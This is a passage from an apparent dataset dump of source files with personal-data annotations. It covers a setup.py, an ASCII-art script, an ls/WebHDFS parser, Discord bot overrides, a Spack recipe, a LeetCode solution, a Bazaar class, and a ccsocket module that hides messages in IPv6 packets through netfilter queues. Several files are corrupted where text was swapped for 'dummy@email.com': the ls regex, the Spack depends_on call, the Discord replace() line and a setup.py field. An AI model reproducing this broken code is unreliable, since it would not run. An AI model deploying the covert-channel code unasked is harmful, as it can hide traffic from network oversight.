'self.ma'], ['URL', 'spdom.no'], ['URL', 'self.th'], ['URL', 'self.pl'], ['URL', 'md.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'self.th'], ['URL', 'md.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'self.pl'], ['URL', 'md.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'md.fi'], ['URL', 'self.cn'], ['URL', 'md.fi'], ['URL', 'self.cn'], ['URL', 'md.fi'], ['URL', 'self.cn'], ['URL', 'md.fi'], ['URL', 'self.ad'], ['URL', 'md.fi'], ['URL', 'self.ad'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.st'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.co'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.at'], ['URL', 'md.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'self.at'], ['URL', 'md.fi'], ['URL', 'val.fi'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me']]"
55,"import sys
from setuptools import setup
tests_require = [""nose>=1.0""]
if sys.version_info < (3,0):
tests_require = [""nose>=1.0"", ""mock""]
setup(
name=""unitils"",
version=""0.1.2"",
author=""iLoveTux"",
dummy@email.com"",
description=""Cross platform utilities I have found to be incredibly useful"",
license=""GPLv3"",
keywords=""utility tools cli"",
url=""http://github.com/ilovetux/unitils"",
packages=['unitils'],
install_requires=[""colorama""],
entry_points={
""console_scripts"": [
""cat.py=unitils.cli:cat"",
""cp.py=unitils.cli:cp"",
""find.py=unitils.cli:find"",
""grep.py=unitils.cli:grep"",
""head.py=unitils.cli:head"",
""ls.py=unitils.cli:ls"",
""mv.py=unitils.cli:mv"",
""watch.py=unitils.cli:watch"",
""wc.py=unitils.cli:wc"",
""which.py=unitils.cli:which"",
]
},
test_suite=""nose.collector"",
tests_require=tests_require,
classifiers=[
""Development Status :: 4 - Beta"",
""Topic :: Utilities"",
""License :: OSI Approved :: GNU General Public License v3 (GPLv3)"",
],
)
",1171,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'GPLv3'], ['URL', 'http://github.com/ilovetux/unitils"",'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ' :: '], ['URL', 'sys.ve'], ['URL', 'email.com'], ['URL', 'cat.py'], ['URL', 'unitils.cl'], ['URL', 'cp.py'], ['URL', 'unitils.cl'], ['URL', 'find.py'], ['URL', 'unitils.cl'], ['URL', 'grep.py'], ['URL', 'unitils.cl'], ['URL', 'head.py'], ['URL', 'unitils.cl'], ['URL', 'ls.py'], ['URL', 'unitils.cl'], ['URL', 'mv.py'], ['URL', 'unitils.cl'], ['URL', 'watch.py'], ['URL', 'unitils.cl'], ['URL', 'wc.py'], ['URL', 'unitils.cl'], ['URL', 'which.py'], ['URL', 'unitils.cl'], ['URL', 'nose.co']]"
56,"#!/usr/bin/env python
# asciinator.py
#
# Copyright 2014 Christian Diener dummy@email.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
from __future__ import print_function # for python2 compat
import sys;
from PIL import Image;
import numpy as np
# ascii chars sorted by ""density""
chars = np.asarray(list(' .,:;irsXA253hMHGS#9B&@'))
# check command line arguments
if len(sys.argv) != 4:
print( 'Usage: asciinator.py image scale factor' )
sys.exit()
# set basic program parameters
# f = filename, SC = scale, GCF = gamma correction factor, WCF = width correction factor
f, SC, GCF, WCF = sys.argv[1], float(sys.argv[2]), float(sys.argv[3]), 7.0/4.0
# open, scale and normalize image by pixel intensities
img = Image.open(f)
S = (int(img.size[0]*SC*WCF), int(img.size[1]*SC))
img = np.sum( np.asarray(img.resize(S), dtype=""float""), axis=2)
img -= img.min()
img = (1.0 - img/img.max())**GCF*(chars.size-1)
# Assemble and print ascii art
print( ""\n"".join(("""".join(r) for r in chars[img.astype(int)])))
print()
",1717,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Christian Diener'], ['LOCATION', 'Boston'], ['LOCATION', 'USA'], ['LOCATION', 'SC'], ['LOCATION', 'SC'], ['URL', 'asciinator.py'], ['URL', 'email.com'], ['URL', 'np.as'], ['URL', 'sys.ar'], ['URL', 'asciinator.py'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'img.si'], ['URL', 'img.si'], ['URL', 'np.su'], ['URL', 'np.as'], ['URL', 'img.re'], ['URL', 'img.ma'], ['URL', 'chars.si'], ['URL', 'img.as']]"
57,"#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import datetime
from time import strptime
import re
import os
import json
class FileStatus(object):
def __init__(self, path, rights, nbFiles, owner, group, size, date, relpath = None):
self.path = path
self.rights = rights
self.nbFiles = nbFiles
self.owner = owner
self.group = group
self.size = size
self.date = date
self.relpath = relpath
def __eq__(self, other):
return (self.path == other.path and self.rights == other.rights and
self.nbFiles == other.nbFiles and self.owner == other.owner and self.group == other.group and
self.size == other.size and self.date == other.date)
def is_dir(self):
return self.rights.startswith(""d"")
def __str__(self):
return self.to_str(0, 0, 0, 0, 0, 0, 0)
def to_str(self, rights_width, nbFiles_width, owner_width, group_width, size_width, date_width, path_with):
if self.is_dir:
nb_files = ""-""
else:
nb_files = str(self.nbFiles)
result = ""%s %s %s %s %s %s %s"" % (self.rights.ljust(rights_width),
nb_files.ljust(nbFiles_width),
self.owner.ljust(owner_width),
self.group.ljust(group_width),
str(self.size).ljust(size_width),
self.date.strftime(""%Y-%M-%d %H:%M"").ljust(date_width),
self.path.ljust(path_with))
return result.encode(""utf-8"")
def get_file_statuses_pretty_print(file_statuses):
rights_width = 0
nb_files_width = 0
owner_width = 0
group_width = 0
size_width = 0
date_width = 0
path_width = 0
if len(file_statuses) != 0:
rights_width = max([len(fs.rights) for fs in file_statuses])
nb_files_width = max([len(str(fs.nbFiles)) for fs in file_statuses])
owner_width = max([len(fs.owner) for fs in file_statuses])
group_width = max([len(fs.group) for fs in file_statuses])
size_width = max([len(str(fs.size)) for fs in file_statuses])
date_width = max([len(fs.date.strftime(""%Y-%M-%d %H:%M"")) for fs in file_statuses])
path_width = max([len(fs.path) for fs in file_statuses])
result = []
for file_status in file_statuses:
result.append(file_status.to_str(rights_width, nb_files_width, owner_width, group_width, size_width, date_width, path_width))
return ""\n"".join(result)
class LsParser(object):
def __init__(self):
pass
def parse_line(self, line):
regex = ""^(dummy@email.com)$""
m = re.match(regex, line, re.UNICODE)
if m is None:
return None
rights = m.group(1)
nbFiles = int(m.group(2))
owner = m.group(3)
group = m.group(4)
size = int(m.group(5))
day = int(m.group(6))
month = m.group(7)
try:
month = strptime(month, '%b').tm_mon
except:
month = [u""jan"", u""fév"", u""mar"", u""avr"", u""mai"", u""jui"", u""juil"", u""aoû"", u""sep"", u""oct"", u""nov"", u""déc""].index(month) + 1
try:
year = int(m.group(8))
except:
year = datetime.datetime.now().year
filename = m.group(9)
date = datetime.date(year, month, day)
return FileStatus(filename, rights, nbFiles, owner, group, size, date)
def parse(self, output):
result = [self.parse_line(line) for line in output.split(""\n"")]
return [p for p in result if p is not None]
class WebHdfsParser(object):
def __init__(self, path):
self.path = path
def permissions_to_unix_name(self, is_dir, rights):
is_dir_prefix = 'd' if is_dir else '-'
sticky = False
if len(rights) == 4 and rights[0] == '1':
sticky = True
rights = rights[1:]
dic = {'7': 'rwx', '6': 'rw-', '5': 'r-x', '4': 'r--', '3': '-wx', '2': '-w-', '1': '--x', '0': '---'}
result = is_dir_prefix + ''.join(dic[x] for x in rights)
if sticky:
result = result[:-1] + ""t""
return result
def parse_status(self, status):
relpath = status[""pathSuffix""]
path = os.path.join(self.path, relpath)
nbFiles = 0
size = status[""length""]
owner = status[""owner""]
group = status[""group""]
is_dir = status[""type""] == ""DIRECTORY""
right_digits = status[""permission""]
rights = self.permissions_to_unix_name(is_dir, right_digits)
parsed_date = datetime.datetime.utcfromtimestamp(int(status[""modificationTime""])/1000)
date = datetime.datetime(parsed_date.year, parsed_date.month, parsed_date.day, parsed_date.hour, parsed_date.minute)
return FileStatus(path, rights, nbFiles, owner, group, size, date, relpath)
def parse(self, output):
try:
j = json.loads(output)
except:
print output
return []
if ""FileStatuses"" not in j or ""FileStatus"" not in j[""FileStatuses""]:
print j
return []
statuses = j[""FileStatuses""][""FileStatus""]
result = []
for status in statuses:
result.append(self.parse_status(status))
return result
",5405,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['NRP', 'other.nbFiles'], ['PERSON', 'self.owner == other.owner'], ['NRP', 'self.rights.ljust(rights_width'], ['LOCATION', 'self.date.strftime(""%Y-%M-%d'], ['NRP', 'owner_width'], ['LOCATION', 'owner_width'], ['DATE_TIME', 'month'], ['DATE_TIME', 'parsed_date.day'], ['URL', 'self.pa'], ['URL', 'self.gr'], ['URL', 'self.si'], ['URL', 'self.re'], ['URL', 'self.pa'], ['URL', 'other.pa'], ['URL', 'self.gr'], ['URL', 'other.gr'], ['URL', 'self.si'], ['URL', 'other.si'], ['URL', 'self.rights.st'], ['URL', 'self.to'], ['URL', 'self.is'], ['URL', 'self.gr'], ['URL', 'self.si'], ['URL', 'self.date.st'], ['URL', 'self.pa'], ['URL', 'fs.gr'], ['URL', 'fs.si'], ['URL', 'fs.date.st'], ['URL', 'fs.pa'], ['URL', 'status.to'], ['URL', 'email.com'], ['URL', 're.ma'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'datetime.datetime.no'], ['URL', 'm.gr'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'os.path.jo'], ['URL', 'self.pa'], ['URL', 'self.pe'], ['URL', 'date.ye'], ['URL', 'date.mo'], ['URL', 'self.pa']]"
58,"# coding=utf-8
""""""Overrides for Discord.py classes""""""
import contextlib
import inspect
import io
import itertools
import re
import discord
from discord.ext.commands import HelpFormatter as HelpF, Paginator, Command
from bot.utils import polr, privatebin
from bot.utils.args import ArgParseConverter as ArgPC
def create_help(cmd, parser):
""""""Creates an updated usage for the help command""""""
default = cmd.params['args'].default
if cmd.signature.split(""["")[-1] == f""args={default}]"" if default else ""args]"":
sio = io.StringIO()
with contextlib.redirect_stdout(sio):
parser.print_help()
sio.seek(0)
s = sio.read()
# Strip the filename and trailing newline from help text
arg_part = s[(len(str(s[7:]).split()[0]) + 8):-1]
k = cmd.qualified_name
spt = len(k.split())
# Remove a duplicate command name + leading arguments
split_sig = cmd.signature.split()[spt:]
return ""["".join(("" "".join(split_sig)).split(""["")[:-1]) + arg_part
return cmd.usage
class HelpFormatter(HelpF):
""""""Custom override for the default help command""""""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._paginator = None
async def format(self):
""""""Handles the actual behaviour involved with formatting.
To change the behaviour, this method should be overridden.
Returns
--------
list
A paginated output of the help command.
""""""
self._paginator = Paginator()
# we need a padding of ~80 or so
description = self.command.description if not self.is_cog() else inspect.getdoc(self.command)
if description:
# portion
self._paginator.add_line(description, empty=True)
if isinstance(self.command, Command):
#
if self.command.params.get(""args"", None) and type(self.command.params['args'].annotation) == ArgPC:
self.command.usage = create_help(self.command, self.command.params['args'].annotation.parser)
signature = self.get_command_signature()
self._paginator.add_line(signature, empty=True)
# section
if self.command.help:
self._paginator.add_line(self.command.help, empty=True)
# end it here if it's just a regular command
if not self.has_subcommands():
self._paginator.close_page()
return self._paginator.pages
max_width = self.max_name_size
def category(tup):
""""""Splits the help command into categories for easier readability""""""
cog = tup[1].cog_name
# we insert the zero width space there to give it approximate
# last place sorting position.
return cog + ':' if cog is not None else '\u200bNo Category:'
filtered = await self.filter_command_list()
if self.is_bot():
data = sorted(filtered, key=category)
for category, commands in itertools.groupby(data, key=category):
# there simply is no prettier way of doing this.
commands = sorted(commands)
if len(commands) > 0:
self._paginator.add_line(category)
self._add_subcommands_to_page(max_width, commands)
else:
filtered = sorted(filtered)
if filtered:
self._paginator.add_line('Commands:')
self._add_subcommands_to_page(max_width, filtered)
# add the ending note
self._paginator.add_line()
ending_note = self.get_ending_note()
self._paginator.add_line(ending_note)
return self._paginator.pages
_mentions_transforms = {
'@everyone': '@\u200beveryone',
'@here': '@\u200bhere'
}
_mention_pattern = re.compile('|'.join(_mentions_transforms.keys()))
def _is_submodule(parent, child):
return parent == child or child.startswith(parent + ""."")
async def _default_help_command(ctx, *commands: str):
""""""Shows this message.""""""
bot = ctx.bot
destination = ctx.message.author if bot.pm_help else ctx.message.channel
def repl(obj):
return _mentions_transforms.get(obj.group(0), '')
# help by itself just lists our own commands.
if len(commands) == 0:
pages = await bot.formatter.format_help_for(ctx, bot)
elif len(commands) == 1:
# try to see if it is a cog name
name = _mention_pattern.sub(repl, commands[0])
command = None
if name in bot.cogs:
command = bot.cogs[name]
else:
command = bot.all_commands.get(name)
if command is None:
await destination.send(bot.command_not_found.format(name))
return
pages = await bot.formatter.format_help_for(ctx, command)
else:
name = _mention_pattern.sub(repl, commands[0])
command = bot.all_commands.get(name)
if command is None:
await destination.send(bot.command_not_found.format(name))
return
for key in commands[1:]:
try:
key = _mention_pattern.sub(repl, key)
command = command.all_commands.get(key)
if command is None:
await destination.send(bot.command_not_found.format(key))
return
except AttributeError:
await destination.send(bot.command_has_no_subcommands.format(command, key))
return
pages = await bot.formatter.format_help_for(ctx, command)
if bot.pm_help is None:
characters = sum(map(len, pages))
# modify destination based on length of pages.
if characters > 1000:
destination = ctx.message.author
for page in pages:
try:
await destination.send(page)
except discord.Forbidden:
destination = ctx.message.channel
await destination.send(page)
old_send = discord.abc.Messageable.send
async def send(self, content=None, **kwargs):
""""""Overrides default send method in order to create a paste if the response is more than 2000 characters""""""
if content is not None and any(x in str(content) for x in [""@everyone"", ""@here""]):
content = content.replace(""@everyone"", dummy@email.com(""@here"", ""@h\u0435re"")
if content is not None and len(str(content)) > 2000:
if content.startswith(""```py""):
content = ""\n"".join(content.split(""\n"")[1:-1])
paste = await privatebin.upload(content, expires=""15min"", server=self.bot.priv)
if self.bot.polr:
paste = await polr.shorten(paste, **self.bot.polr)
return await old_send(self, f""Hey, I couldn't handle all the text I was gonna send you, so I put it in a paste!""
f""\nThe link is **{paste}**, but it expires in 15 minutes, so get it quick!"",
**kwargs)
else:
return await old_send(self, content, **kwargs)
",7157,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Discord.py'], ['PERSON', 'sio = io.'], ['PERSON', 'StringIO'], ['LOCATION', 'parser.print_help'], ['PERSON', 'self.is_cog'], ['PERSON', 'self.is_bot'], ['LOCATION', 'bot.pm_help'], ['LOCATION', 'bot.pm_help'], ['DATE_TIME', '15 minutes'], ['URL', 'Discord.py'], ['URL', 'discord.ext.com'], ['URL', 'bot.utils.ar'], ['URL', 'cmd.pa'], ['URL', 'cmd.si'], ['URL', 'io.St'], ['URL', 'contextlib.red'], ['URL', 'parser.pr'], ['URL', 'sio.se'], ['URL', 'sio.re'], ['URL', 'cmd.si'], ['URL', 'cmd.us'], ['URL', 'self.command.de'], ['URL', 'self.is'], ['URL', 'inspect.ge'], ['URL', 'self.com'], ['URL', 'paginator.ad'], ['URL', 'self.com'], ['URL', 'self.command.params.ge'], ['URL', 'self.command.pa'], ['URL', 'self.command.us'], ['URL', 'self.com'], ['URL', 'self.command.pa'], ['URL', '.annotation.pa'], ['URL', 'self.ge'], ['URL', 'paginator.ad'], ['URL', 'self.com'], ['URL', 'paginator.ad'], ['URL', 'self.com'], ['URL', 'paginator.cl'], ['URL', 'paginator.pa'], ['URL', 'self.ma'], ['URL', 'self.fi'], ['URL', 'self.is'], ['URL', 'itertools.gr'], ['URL', 'paginator.ad'], ['URL', 'paginator.ad'], ['URL', 'paginator.ad'], ['URL', 'self.ge'], ['URL', 'paginator.ad'], ['URL', 'paginator.pa'], ['URL', 're.com'], ['URL', 'transforms.ke'], ['URL', 'child.st'], ['URL', 'ctx.bo'], ['URL', 'ctx.message.au'], ['URL', 'bot.pm'], ['URL', 'ctx.message.ch'], ['URL', 'transforms.ge'], ['URL', 'obj.gr'], ['URL', 'bot.formatter.fo'], ['URL', 'pattern.su'], ['URL', 'bot.co'], ['URL', 'bot.co'], ['URL', 'bot.al'], ['URL', 'commands.ge'], ['URL', 'destination.se'], ['URL', 'bot.com'], ['URL', 'found.fo'], ['URL', 'bot.formatter.fo'], ['URL', 'pattern.su'], ['URL', 'bot.al'], ['URL', 'commands.ge'], ['URL', 'destination.se'], ['URL', 'bot.com'], ['URL', 'found.fo'], ['URL', 'pattern.su'], ['URL', 'command.al'], ['URL', 'commands.ge'], ['URL', 'destination.se'], ['URL', 'bot.com'], ['URL', 'found.fo'], ['URL', 'destination.se'], ['URL', 'bot.com'], ['URL', 'subcommands.fo'], ['URL', 'bot.formatter.fo'], ['URL', 'bot.pm'], ['URL', 'ctx.message.au'], ['URL', 'destination.se'], ['URL', 'discord.Fo'], ['URL', 'ctx.message.ch'], ['URL', 'destination.se'], ['URL', 'discord.abc.Messageable.se'], ['URL', 'content.re'], ['URL', 'email.com'], ['URL', 'content.st'], ['URL', 'self.bot.pr'], ['URL', 'self.bo'], ['URL', 'polr.sh'], ['URL', 'self.bo']]"
59,"##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, dummy@email.com, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RLimma(RPackage):
""""""Data analysis, linear models and differential expression
for microarray data.""""""
homepage = ""https://www.bioconductor.org/packages/limma/""
url = ""https://git.bioconductor.org/packages/limma""
list_url = homepage
version('3.32.10', git='https://git.bioconductor.org/packages/limma', commit='PI:KEY')
version('3.32.6', 'PI:KEY')
depends_on(dummy@email.com', dummy@email.com')
",1694,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'https://git.bioconductor.org/packages/limma""'], ['URL', ""https://git.bioconductor.org/packages/limma',""], ['DATE_TIME', '2013-2017'], ['PERSON', 'Todd Gamblin'], ['DATE_TIME', 'February 1999'], ['LOCATION', 'Boston'], ['LOCATION', 'USA'], ['URL', 'https://github.com/llnl/spack'], ['URL', 'https://www.bioconductor.org/packages/limma/""'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com']]"
60,"#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
*****************************************
Author: zhlinh
Email: dummy@email.com
Version: 0.0.1
Created Time: 2016-03-11
Last_modify: 2016-03-11
******************************************
'''
'''
Given a 2D board containing 'X' and 'O',
capture all regions surrounded by 'X'.
A region is captured by flipping all 'O's
into 'X's in that surrounded region.
For example,
X X X X
X O O X
X X O X
X O X X
After running your function, the board should be:
X X X X
X X X X
X X X X
X O X X
'''
class Solution(object):
def solve(self, board):
""""""
:type board: List[List[str]]
:rtype: void Do not return anything, modify board in-place instead.
""""""
m = len(board)
if m < 2:
return
n = len(board[0])
for i in range(m):
self.helper(board, i, 0, m, n)
if n > 1:
self.helper(board, i, n - 1, m, n)
for j in range(n):
self.helper(board, 0, j, m, n)
if m > 1:
self.helper(board, m - 1, j, m, n)
for i in range(m):
for j in range(n):
if board[i][j] == 'O':
board[i][j] = 'X'
if board[i][j] == '1':
board[i][j] = 'O'
def helper(self, board, i, j, m, n):
if board[i][j] == 'O':
board[i][j] = '1'
# trick here, normally it could be i >= 1.
# but the boardary will alays get checked.
# so i == 1, then check 0 is duplicated.
if i > 1:
self.helper(board, i - 1, j, m, n)
if i < m - 2:
self.helper(board, i + 1, j, m, n)
if j > 1:
self.helper(board, i, j - 1, m, n)
if j < n - 2:
self.helper(board, i, j + 1, m, n)
",1908,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2016-03-11'], ['DATE_TIME', '2016-03-11'], ['URL', 'email.com']]"
61,"#!/usr/bin/python
# -*- coding: UTF-8 -*-
## This file is part of ccsocket
## Copyright (C) Tomas Dragoun dummy@email.com
## This program is published under a GPLv3 license
########################################################
import nfqueue
import sys
import signal
from multiprocessing import Process, Pipe, Lock
from socket import AF_INET6
from scapy.all import *
from scapy.layers.inet6 import ICMPv6Unknown
from headers import IPv6ExtHdrAH
from constants import Constants
############################
## ##
## NFQHandler ##
## ##
############################
class NFQHandler(Process):
#----------------------------------------------------------------------------------
'''
This class handles netfilter queue. Is connected with a parent process
via pipe. Messages are decoded and removed from incoming packets, data
are send to pipe. In passive mode intercept queue both incoming outgo-
ing traffic. Inherits multiprocessing.Process
'''
#----------------------------------------------------------------------------------
def __init__(self, encoder, pipe, sendevt, stopevt, proto, active, address):
''' Call parent's constructor at first '''
Process.__init__(self) # init parent (multiprocessing.Process)
self.name = 'NFQHandler-port ' + str(address[1])
self.daemon = True # set process daemonic
''' Initialize class attributes '''
self._const = Constants()
self._encoder = encoder # encodes message in packet
self._pipe = pipe # exchange data with parent process via pipe
self._can_send = sendevt # event shared with parent process
self._stop_send = stopevt # event shared with parent process
self._proto = proto # upper-layer protocol
self._active = active # mode
self._host = address[0]
self._port = address[1]
'''
Folowing steps prepare netfilter queue with _port as queue
number. There is always only one active queue associated
with given number.
'''
self._queue = nfqueue.queue() # create queue
self._queue.open() # open queue
try:
self._queue.bind(AF_INET6) # set family type AF_INET6
except: # fails when any other queue already runs
pass
self._queue.set_callback(self.handlepacket) # set queue callback
'''
Final step raises RuntimeError in case there is some other
queue with the same number active, queue wasn't closed
properly or user's priviledges are insufficient.
'''
try:
self._queue.create_queue(self._port)
except Exception, e:
raise e
#----------------------------------------------------------------------------------
def __del__(self):
if self._pipe: # close connection with parent process
self._pipe.close()
#----------------------------------------------------------------------------------
def destroyqueue(self):
''' Attempts to close queue '''
if self._queue:
#print 'stopping queue ' + str(self._port)
self._queue.close() # close queue
self._queue = None
#----------------------------------------------------------------------------------
def _clear(self):
''' Removes all data to send from pipe and sets state to idle '''
while self._pipe.poll(): # clear pipe
self._pipe.recv()
self._can_send.set()
self._stop_send.clear()
#----------------------------------------------------------------------------------
def run(self):
'''
Runs endless loop. Every time a packet is occurs in queue
_handlepacket method is called.
'''
#print 'starting queue ' + str(self._port)
self._queue.try_run()
#----------------------------------------------------------------------------------
def handlepacket(self, number, payload):
''' Queue callback function '''
packet = IPv6(payload.get_data()) # decode packet from queue as IPv6
'''
Check if packet belongs to this queue - upperlayer ID field must match
in active mode.
'''
modify, reroute = self._checkport(packet)
if not modify:
'''
Reroute packet to correct queue. Verdict NF_QUEUE is 32-bit
number. Lower 16 bits code this verdict and upper 16 bits
are used to identify target queue.
'''
if reroute != -1:
error = payload.set_verdict(nfqueue.NF_QUEUE | (reroute << 16))
if not error:
return
'''
Packet doesn't have icmp echo layer or target port isn't active,
accept packet
'''
payload.set_verdict(nfqueue.NF_ACCEPT)
return
'''
Port is ok, we need to check if address matches. Ip6tables rules filter
addresses, but packet might have been rerouted from other queue.
'''
if len(self._host): # check source/destination address
if packet.src != self._host and packet.dst != self._host:
payload.set_verdict(nfqueue.NF_ACCEPT)
return
'''
Nfqueue mark is used to distinguish between incoming and outgoing
packets. Each packet is marked.
'''
mark = payload.get_nfmark() # get mark of this packet
if mark == 1: # incoming packet
self._incoming(packet, payload)
elif mark == 2: # outgoing packet
self._outgoing(packet, payload)
#----------------------------------------------------------------------------------
def _incoming(self, packet, payload):
message = self._encoder.getmessage(packet) # decode message
if message is None: # no message
''' Accept packet '''
payload.set_verdict(nfqueue.NF_ACCEPT)
else:
''' Remove message and pass modified packet to queue '''
modified_packet = self._encoder.removemessage(packet)
payload.set_verdict_modified(nfqueue.NF_ACCEPT,
str(modified_packet),
len(modified_packet))
try:
if not len(message):
return
except:
pass
self._pipe.send((message, (packet.src, self._port, 0, 0)))
#----------------------------------------------------------------------------------
def _outgoing(self, packet, payload):
if self._stop_send.is_set():
self._clear()
if self._pipe.poll(): # any data to send?
message = self._pipe.recv() # get message
''' Encode message and return modified packet to queue '''
modified_packet = self._encoder.addmessage(message, (packet, None))
payload.set_verdict_modified(nfqueue.NF_ACCEPT,
str(modified_packet),
len(modified_packet))
if not self._pipe.poll(): # sending finished
self._can_send.set()
else: # nothing to send, return packet to queue
payload.set_verdict(nfqueue.NF_ACCEPT)
#----------------------------------------------------------------------------------
def _checkport(self, packet):
'''
Returns tuple (bool, value). True, if packet belongs to this queue. In pa-
ssive mode always returns True. In active mode upperlayer id field must ma-
tch current _port number. Value is number of queue where will be packet re-
routed.
'''
''' Passive mode - override icmp id check '''
if not self._active:
return (True, 0)
''' Active mode - check icmp (or fragment) id field (~ represents port) '''
if packet.haslayer(ICMPv6EchoRequest): # upperlayer ICMPv6EchoRequest
id = packet[ICMPv6EchoRequest].id
elif packet.haslayer(ICMPv6EchoReply): # upperlayer ICMPv6EchoReply
id = packet[ICMPv6EchoReply].id
elif packet.haslayer(IPv6ExtHdrFragment): # fragmented packet
id = packet[IPv6ExtHdrFragment].id
elif packet.haslayer(ICMPv6Unknown) and packet.haslayer(IPv6ExtHdrAH):
type = packet[ICMPv6Unknown].type # ICMPv6 packet with AH
if type != 128 and type != 129:
return (False, -1) # accept packet
packet[IPv6ExtHdrAH].decode_payload_as(ICMPv6EchoRequest)
id = packet[ICMPv6EchoRequest].id
elif self._proto == self._const.PROTO_ALL: # any protocol
return (True, 0) # id matches port number
else:
return (False, -1) # accept packet
if id == self._port:
return (True, 0) # id matches port number
else:
return (False, id) # reroute to correct queue
#----------------------------------------------------------------------------------
",9616,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Tomas Dragoun'], ['PERSON', 'GPLv3'], ['LOCATION', '#'], ['LOCATION', '#'], ['LOCATION', 'stopevt'], ['PERSON', 'self._active'], ['PERSON', 'Verdict NF_QUEUE'], ['PERSON', 'upperlayer ICMPv6EchoRequest\n i'], ['PERSON', 'AH'], ['URL', 'email.com'], ['URL', 'scapy.al'], ['URL', 'scapy.layers.in'], ['URL', 'multiprocessing.Pro'], ['URL', 'multiprocessing.Pro'], ['URL', 'self.na'], ['URL', 'queue.bi'], ['URL', 'queue.se'], ['URL', 'queue.cr'], ['URL', 'pipe.cl'], ['URL', 'queue.cl'], ['URL', 'pipe.re'], ['URL', 'send.se'], ['URL', 'send.cl'], ['URL', 'queue.tr'], ['URL', 'payload.ge'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'packet.sr'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'payload.ge'], ['URL', 'encoder.ge'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'encoder.re'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'pipe.se'], ['URL', 'packet.sr'], ['URL', 'send.is'], ['URL', 'pipe.re'], ['URL', 'encoder.ad'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'send.se'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'const.PRO']]"
62,"###############################################################################
# Name: Cody Precord #
# Purpose: SourceControl implementation for Bazaar #
# Author: Cody Precord dummy@email.com #
# Copyright: (c) 2008 Cody Precord dummy@email.com #
# License: wxWindows License #
###############################################################################
""""""Bazaar implementation of the SourceControl object """"""
__author__ = ""Cody Precord dummy@email.com""
__revision__ = ""$Revision: 867 $""
__scid__ = ""$Id: BZR.py 867 2009-05-06 12:10:55Z CodyPrecord $""
#------------------------------------------------------------------------------#
# Imports
import os
import datetime
import re
import time
# Local imports
from SourceControl import SourceControl, DecodeString
#------------------------------------------------------------------------------#
class BZR(SourceControl):
"""""" Bazaar source control class """"""
name = 'Bazaar'
command = 'bzr'
ccache = list() # Cache of paths that are under bazaar control
repocache = dict()
def __repr__(self):
return 'BZR.BZR()'
def getAuthOptions(self, path):
"""""" Get the repository authentication info """"""
output = []
return output
def getRepository(self, path):
"""""" Get the repository of a given path """"""
if path in self.repocache:
return self.repocache[path]
if not os.path.isdir(path):
